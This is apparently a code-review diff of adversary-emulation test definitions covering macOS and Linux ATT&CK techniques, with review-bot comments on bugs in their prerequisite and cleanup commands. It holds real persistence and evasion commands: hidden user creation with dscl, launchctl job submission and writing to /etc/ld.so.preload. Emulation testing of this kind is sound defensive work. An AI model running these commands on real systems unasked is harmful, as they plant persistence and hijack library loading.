@@ -153,15 +153,13 @@ atomic_tests: - description: | Files to zip must exist (#{input_files}) prereq_command: | - ls #{input_files} + if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; get_prereq_command: | echo Please set input_files argument to include files that exist executor: name: sh elevation_required: false - prereq_command: | - ls #{input_files} > /dev/null command: | zip #{output_file} #{input_files} cleanup_command: | diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml index b0ce7692..340a8ca2 100644 --- a/atomics/T1564.001/T1564.001.yaml +++ b/atomics/T1564.001/T1564.001.yaml @@ -100,6 +100,11 @@ atomic_tests: Hide a directory on MacOS supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: command: | touch /var/tmp/T1564.001_mac.txt diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml index fc8e8064..de822dc9 100644 --- a/atomics/T1564.002/T1564.002.yaml +++ b/atomics/T1564.002/T1564.002.yaml @@ -15,4 +15,7 @@ atomic_tests: executor: command: | sudo dscl . -create /Users/#{user_name} UniqueID 333 - name: sh \ No newline at end of file + cleanup_command: | + sudo dscl . -delete /Users/#{username} + elevation_required: true + name: sh diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml index 840b6279..11df555e 100644 --- a/atomics/T1569.001/T1569.001.yaml +++ b/atomics/T1569.001/T1569.001.yaml 
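Review bot: `if [ $(ls #{input_files} | wc -l) > 0 ]` does not compare numbers: inside single brackets `>` is a shell redirection, so the check writes a file named `0` into the working directory and evaluates `[ N ]`, which is true for any non-empty string, meaning the prereq passes even when `ls` found nothing. Use an arithmetic comparison, `if [ "$(ls #{input_files} 2>/dev/null | wc -l)" -gt 0 ]; then exit 0; else exit 1; fi;`, which also keeps the ls error output out of the prereq log.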
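Review bot: The new `filename` argument in the T1564.001 hunk (default `/tmp/evil`, described as `path of file to hide`) is not used by the visible command line `touch /var/tmp/T1564.001_mac.txt`; the rest of the executor runs past the hunk, but if no line references `#{filename}` the argument is dead and its description misleads. Either substitute `#{filename}` into the command lines or remove the argument.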
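Review bot: The new cleanup in the T1564.002 hunk references `#{username}` while the command uses `#{user_name}`, so the placeholder in `sudo dscl . -delete /Users/#{username}` is never substituted and the cleanup runs against a literal path; it should be `sudo dscl . -delete /Users/#{user_name}`. Note also that `dscl . -create /Users/#{user_name} UniqueID 333` only sets an attribute on the record, whereas `-delete /Users/...` removes the whole record, so if the target user existed before the test the cleanup deletes an account the test did not create; guard it or restore the previous UniqueID instead.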
@@ -7,7 +7,18 @@ atomic_tests: Utilize launchctl supported_platforms: - macos + input_arguments: + executable_path: + description: Path of the executable to run. + type: path + default: /System/Applications/Calculator.app/Contents/MacOS/Calculator + label_name: + description: Path of the executable to run. + type: string + default: evil executor: command: | - launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - name: sh \ No newline at end of file + launchctl submit -l #{label_name} -- #{executable_path} + cleanup_command: | + launchctl remove #{label_name} + name: bash diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml index c75a5006..399ee53f 100644 --- a/atomics/T1574.006/T1574.006.yaml +++ b/atomics/T1574.006/T1574.006.yaml @@ -29,7 +29,8 @@ atomic_tests: executor: command: | sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload' - cleanup_command: "" + cleanup_command: | + sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD
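Review bot: `label_name`'s description in the T1569.001 hunk, `Path of the executable to run.`, is copied from `executable_path`; it should describe the label, e.g. `Label given to the submitted job (passed to launchctl submit -l).` `launchctl submit` may refuse a label that is already registered, and the default `evil` is generic enough to collide with other tests, so a technique-specific default such as `art_T1569_001` would be safer.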
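Review bot: `sudo sed -i '/#{path_to_shared_library}/d' /etc/ld.so.preload` uses `/` as the regex delimiter while the substituted value is a filesystem path full of slashes, so after substitution the address is unterminated and sed errors out, leaving the preload entry in place. Use an alternate delimiter, `sudo sed -i '\|#{path_to_shared_library}|d' /etc/ld.so.preload`, or restore the file from a copy taken before the `echo ... > /etc/ld.so.preload` line — that line also overwrites any pre-existing entries, which a line-deleting cleanup cannot bring back.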